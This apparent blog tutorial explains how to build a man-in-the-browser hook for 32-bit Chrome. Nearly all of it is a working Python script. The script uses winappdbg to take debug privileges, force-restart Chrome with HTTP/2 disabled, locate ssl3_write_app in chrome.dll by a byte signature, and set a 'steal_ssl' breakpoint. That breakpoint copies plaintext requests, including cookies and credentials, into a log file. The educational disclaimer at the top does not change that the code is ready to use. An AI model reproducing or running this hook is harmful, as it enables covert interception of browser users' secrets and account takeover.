Man-in-the-browser on Chrome
Another weekend, another MitB (man-in-the-browser) article!
This time we will talk about 32-bit Chrome (one of the latest versions at the time of writing).
Before proceeding...
The only purpose of this article is to illustrate how attackers develop this kind of malicious software.
I don't take any responsibility for illegal actions carried out by readers.
Curiosity is about how software works, not about how to harm others!
After some googling I was able to identify chrome.dll as the module holding the SSL3 methods, and in particular the ssl3_write_app method. Note that the signature and the structure offset used below were derived for the specific Chrome build I tested; on another build they have to be re-derived.
The following code was helpful in finding the PID of the process in which chrome.dll is loaded (it uses the winappdbg package and must run with debug privileges, i.e. from an elevated prompt):
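from winappdbg import *

# Request the debug privilege up front: without it, opening another user's
# process and enumerating its modules below fails with access denied, so this
# has to run from an elevated session.
System.request_debug_privileges()
debug = Debug()

if __name__ == "__main__":
    system = System()
    # Walk every running process and print the PID of each chrome.exe that
    # has chrome.dll mapped, i.e. the module holding the SSL3 code we hook.
    for p in system:
        # Case-insensitive match: the module check below already lowercases,
        # and Windows image names are not case-sensitive.
        if "chrome.exe" not in str(p.get_filename()).lower():
            continue
        process = Process(p.get_pid())
        for mod in process.iter_modules():
            if "chrome.dll" in mod.get_filename().lower():
                # Base and size of chrome.dll bound the later signature scan.
                mod_addr = mod.get_base()
                mod_size = mod.get_size()
                print(p.get_pid())
# I was able to identify the SSL3 structure signature which starts with "0000000304030000".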
We can then place a breakpoint on each matching address in order to find the one that is ssl3_write_app.
Furthermore, as on Firefox, we need to disable HTTP/2 with the command-line flag --disable-http2.
The final Python script follows:
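from winappdbg import *

# Request the debug privilege up front: attaching to Chrome and reading its
# memory fails with access denied without it, so run from an elevated session.
System.request_debug_privileges()
debug = Debug()

# Byte pattern that marks the start of the SSL3 method structure in chrome.dll
# (the "0000000304030000" signature found while reversing).
SSL3_SIGNATURE = b"\x00\x00\x00\x03\x04\x03\x00\x00"

# Offset from a signature match to the 4-byte slot holding the ssl3_write_app
# pointer. Found empirically for the Chrome build under test; it will differ on
# other builds — TODO confirm per version.
SSL3_WRITE_OFFSET = 48

# Upper bound on bytes copied per hook hit. The original loop read until a NUL
# byte with no limit, so on a buffer that is not NUL-terminated it kept walking
# memory until an unreadable page raised.
MAX_CAPTURE = 64 * 1024


def reverseList(aList):
    """Return *aList* with its element order reversed, joined into a string.

    Used on the 4 raw bytes of a little-endian pointer so that toHex() yields
    the big-endian digits int(..., 16) expects.
    """
    return "".join(aList[::-1])


def toHex(s):
    """Return the lowercase, zero-padded hex digits of the raw bytes in *s*."""
    # bytearray() iterates as ints on both Python 2 and 3, so no ord() needed.
    return "".join("%02x" % b for b in bytearray(s))


def steal_ssl(event):
    """Breakpoint callback: dump the plaintext buffer handed to ssl3_write_app.

    The breakpoint sits on the first instruction of a 32-bit callee with its
    arguments on the stack, so [esp] is the return address, [esp+4] the first
    argument (the SSL socket / subsystem pointer) and [esp+8] the second (the
    application data pointer). The data is read as a NUL-terminated string,
    as in the original. NOTE(review): the third argument at [esp+0xC] is
    presumably the buffer length, which would be the correct way to bound the
    read — confirm against the callee's prototype. Everything captured here is
    pre-encryption request data (cookies, credentials), so treat
    log_chrome.bin as sensitive.
    """
    process = event.get_process()
    thread = event.get_thread()
    stack = thread.get_sp()
    subsystem = process.read_pointer(stack + 0x4)
    value_p = process.read_pointer(stack + 0x8)
    value = process.read(value_p, 1)
    # The original compared against 'x00' (backslash lost), which a one-byte
    # slice can never equal, so the loop never stopped on a NUL. Compare
    # against a real NUL byte and cap the total size.
    while value[-1:] != b"\x00" and len(value) < MAX_CAPTURE:
        value += process.read(value_p + len(value), 1)
    # Binary append mode: this is raw request data, and text mode would
    # translate newlines on Windows (and reject bytes on Python 3).
    with open("log_chrome.bin", "ab") as f:
        f.write(value)
    print("Data: %d, %s" % (subsystem, value))
    debug.cont(event)


def scan(c_kill):
    """Locate chrome.dll in every running Chrome and hook ssl3_write_app.

    With c_kill == 0 this instead kills every chrome.exe, relaunches Chrome
    with --disable-http2 and returns -1; with any other value it scans
    chrome.dll for SSL3_SIGNATURE, reads the ssl3_write_app pointer past each
    match, sets a breakpoint there with steal_ssl as the handler and runs the
    debugger loop until detach.
    """
    system = System()
    for p in system:
        if "chrome.exe" not in str(p.get_filename()).lower():
            continue
        pid = p.get_pid()
        if c_kill == 0:
            # First pass: restart Chrome without HTTP/2 so the hooked write
            # path sees plain requests.
            for pp in system:
                if "chrome.exe" in str(pp.get_filename()).lower():
                    pp.kill()
            # Quote the executable path: Chrome normally lives under
            # "Program Files", and an unquoted path with spaces is a
            # mis-parsed command line.
            system.start_process('"%s" --disable-http2' % str(p.get_filename()))
            return -1
        process = Process(pid)
        for mod in process.iter_modules():
            if "chrome.dll" not in mod.get_filename().lower():
                continue
            mod_addr = mod.get_base()
            mod_size = mod.get_size()
            print(pid)
            # Every signature match inside chrome.dll is a candidate; the
            # pointer SSL3_WRITE_OFFSET bytes past it is ssl3_write_app.
            addresses = list(process.search_bytes(
                SSL3_SIGNATURE,
                minAddr=int(mod_addr + 1),
                maxAddr=int(mod_addr + mod_size)))
            if not addresses:
                # Nothing to hook: do not attach and sit in debug.loop() with
                # no breakpoints set.
                print("SSL3 signature not found in chrome.dll of pid %d" % pid)
                continue
            # Attach once, before placing breakpoints; the original attached
            # inside the loop, once per candidate address.
            debug.attach(pid)
            for a in addresses:
                ssl_write = process.read(a + SSL3_WRITE_OFFSET, 4)
                # 4 little-endian bytes -> function address.
                target = int(toHex(reverseList(ssl_write)), 16)
                debug.break_at(pid, target, steal_ssl)
            try:
                debug.loop()
            finally:
                debug.detach(pid)


if __name__ == "__main__":
    # Pass 0 restarts Chrome with --disable-http2; pass 1 hooks the new
    # instance. NOTE(review): there is no wait between the two passes, so the
    # relaunched process may not have mapped chrome.dll yet when pass 1 runs.
    c_kill = 0
    scan(c_kill)
    c_kill += 1
    scan(c_kill)
# Good Saturday night :)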